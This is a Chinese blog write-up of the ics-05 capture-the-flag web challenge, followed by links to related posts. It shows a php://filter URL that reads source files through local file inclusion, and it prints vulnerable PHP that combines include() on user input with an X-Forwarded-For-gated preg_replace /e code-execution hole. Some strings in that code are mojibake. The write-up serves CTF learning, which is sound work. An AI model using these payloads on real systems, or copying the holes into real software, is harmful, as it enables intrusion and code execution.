攻防世界ics-05

最新推荐文章于 2024-04-05 11:49:47 发布
最新推荐文章于 2024-04-05 11:49:47 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whisper_ZH/article/details/102230445
版权

知识点:

  1. php伪协议:
    php://filter/convert.base64-encode/resource=xx.php

  2. preg_replace()函数漏洞
    preg_replace函数原型:
    mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
    /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

1.进入题题目:根据提示直接点入设备维护中心

在这里插入图片描述

2.查看源码之后没有发现什么疑点,点击云平台设备维护中心后出现可疑点,怀疑是文件读取漏洞

在这里插入图片描述

3.利用PHP伪协议读取源码:

http://111.198.29.45:52591/index.php?page=php://filter/convert.base64-encode/resource=index.php
在这里插入图片描述
base64解密:

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="å¼€|å
³" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开å
³', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输å
¥è¾“出的功能,正在开发中的功能,只能å†
部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

3.代码审计一波

在这里插入图片描述

4.构造payload如下:

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

whisper_ZH
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界1-5题
whisper921的博客
11-05 1335
1
攻防世界unserialize3
whisper_ZH的博客
09-29 1941
本题学习知识点: PHP__wakeup()函数漏洞 在程序执行前,serialize() 函数会首先检查是否存在一个魔术方法 __sleep.如果存在,__sleep()方法会先被调用, 然后才执行串行化(序列化)操作。这个功能可以用于清理对象,并返回一个包含对象中所有变量名称的数组。如果该方法不返回任何内容,则NULL被序列化,导致 一个E_NOTICE错误。与之相反,unserializ...
攻防世界ics-05
最新发布
wangzhemvp的博客
04-05 641
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看源码 + preg_replace 函数漏洞。1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页源代码。
攻防世界 cat
whisper_ZH的博客
09-28 978
** 学习知识点 1.当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容 TRUE为禁用 @ 前缀在 CURLOPT_POSTFIELDS 中发送文件。 FALSE为启用,@开头的value会被当做文件上传。 PHP 5.5.0 中...
攻防世界之miscmisc
weixin_54882883的博客
10-02 3093
攻防世界之miscmisc 首先声明一下这题啊 只能说一点破该【广东话】 这题不难 但是 他在和你打持久战 为什么怎么说呢 让我告诉你 首先 他解压下载了一个 图片 就是这个图片啊 咳咳 这张照片似乎在嘲讽我 一时冲动 理解理解啊 下载了一张图片 看起来没什么 通常我的习惯是 用binwalk去扫描看看的 有没有隐藏什么秘密 好家伙啊 只从在网上买了这本书 干什么事情都算一下 干什么事情都很顺啊 ok啊 隐藏了四个zip啊 每一个都下载来 end文件的就先请他到隔壁领盒饭去 ┌──(root?
攻防世界 Wire1
qq_53105813的博客
08-20 1720
攻防世界wp
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
【CTF MISC】pyc文件反编译到Python源码-2017世安杯CTF writeup详解
weixin_30654583的博客
03-27 2102
1、题目 Create-By-SimpleLab 适合作为桌面的图片 首先是一张图片,然后用StegSolve进行分析,发现二维码 扫码得到一串字符 03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000...
攻防世界——ics-05
m0_62063669的博客
06-21 2227
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1512
攻防世界-ics-05-(详细操作)做题笔记
【愚公系列】2023年06月 攻防世界-Web(ics-02)
时光隧道
06-21 6914
SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用 SSRF 进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。SQL 注入是一种常见的 Web 攻击技术,攻击者通过在输入框等用户交互界面中注入 SQL 代码,进而控制数据库操作,例如读取、修改、删除等。攻击者可通过 SQL 注入进行窃取敏感信息、篡改数据,或直接攻击数据库服务器等。
【愚公系列】2023年05月 攻防世界-Web(ics-05)
时光隧道
05-26 7761
preg_replace 函数是一个正则表达式替换函数,它可以在字符串中执行搜索和替换操作。其中,$pattern是一个正则表达式,是要替换的字符串或字符串数组,$subject是要搜索和替换的原始字符串。使用了不安全的正则表达式:有些正则表达式可能会导致漏洞。例如,使用未经转义的特殊字符,如反斜杠、圆括号和方括号等,可能导致语法错误或意外的行为。使用用户提供的数据作为正则表达式或替换字符串:如果不正确地处理用户提供的数据,攻击者可能会注入恶意代码,导致代码执行或任意文件读取。
攻防世界--ics-02
qq_46263951的博客
01-06 950
初始页面,看到这种页面就比较头疼,无从下手 先来扫下目录 download会让我们下载一个ssrf的pdf文件 secret目录下包含着secret.php和secret_debug.php login页面显示
WriteUp-攻防世界-MISC Become_a_Rockstar
weixin_57806437的博客
05-27 1147
附件为Become_a_Rockstar.rock Leonard Adleman says star Problem Makers is Problem Makers Problem Makers says NCTF{ God takes World A boy says flag The boy is Bob Evil takes your mind A girl says no flag The girl is Alice Truths were ctf hoster violently F
攻防世界 web高手进阶区 8分题 ics-02
闵行小鱼塘
10-04 571
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是ics-02的writeup
攻防世界ics-06
08-12
- *2* *3* [攻防世界Web “ics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值